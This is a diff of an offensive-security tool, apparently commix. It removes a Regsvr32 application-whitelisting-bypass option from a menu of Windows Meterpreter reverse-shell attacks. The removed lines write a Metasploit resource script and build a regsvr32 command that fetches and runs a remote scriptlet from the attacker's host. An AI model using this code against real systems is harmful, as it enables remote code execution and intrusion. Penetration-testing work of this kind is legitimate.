@@ -512,7 +512,6 @@ def other_reverse_shells(separator):
512
512
---[ """ + Style .BRIGHT + Fore .BLUE + """Powershell injection attacks""" + Style .RESET_ALL + """ ]---
513
513
Type '""" + Style .BRIGHT + """1""" + Style .RESET_ALL + """' to use shellcode injection with native x86 shellcode.
514
514
Type '""" + Style .BRIGHT + """2""" + Style .RESET_ALL + """' to use TrustedSec's Magic Unicorn.
515
- Type '""" + Style .BRIGHT + """3""" + Style .RESET_ALL + """' to use Regsvr32.exe application whitelisting bypass.
516
515
\n commix(""" + Style .BRIGHT + Fore .RED + """windows_meterpreter_reverse_tcp""" + Style .RESET_ALL + """) > """ )
517
516
518
517
if any (option in windows_reverse_shell .lower () for option in settings .SHELL_OPTIONS ):
@@ -522,8 +521,6 @@ def other_reverse_shells(separator):
522
521
output = "powershell_attack.rc"
523
522
elif windows_reverse_shell == '2' :
524
523
output = "powershell_attack.txt"
525
- elif windows_reverse_shell == '3' :
526
- output = "regsvr32_applocker_bypass_server.rc"
527
524
else :
528
525
err_msg = "The '" + windows_reverse_shell + "' option, is not valid."
529
526
print (settings .print_error_msg (err_msg ))
@@ -603,24 +600,6 @@ def other_reverse_shells(separator):
603
600
except :
604
601
print (settings .SINGLE_WHITESPACE )
605
602
break
606
-
607
- # Regsvr32.exe application whitelisting bypass
608
- elif windows_reverse_shell == '3' :
609
- with open (output , 'w+' ) as filewrite :
610
- filewrite .write ("use exploit/windows/misc/regsvr32_applocker_bypass_server\n "
611
- "set payload " + payload + "\n "
612
- "set lhost " + str (settings .LHOST ) + "\n "
613
- "set lport " + str (settings .LPORT ) + "\n "
614
- "set srvport " + str (settings .SRVPORT ) + "\n "
615
- "set uripath " + settings .URIPATH + "\n "
616
- "exploit\n \n " )
617
- if not settings .TARGET_OS == "win" :
618
- windows_only_attack_vector ()
619
- continue
620
- else :
621
- other_shell = "regsvr32 /s /n /u /i:http://" + str (settings .LHOST ) + ":" + str (settings .SRVPORT ) + settings .URIPATH + ".sct scrobj.dll"
622
- msf_launch_msg (output )
623
- break
624
603
break
625
604
626
605
# Web delivery script
0 commit comments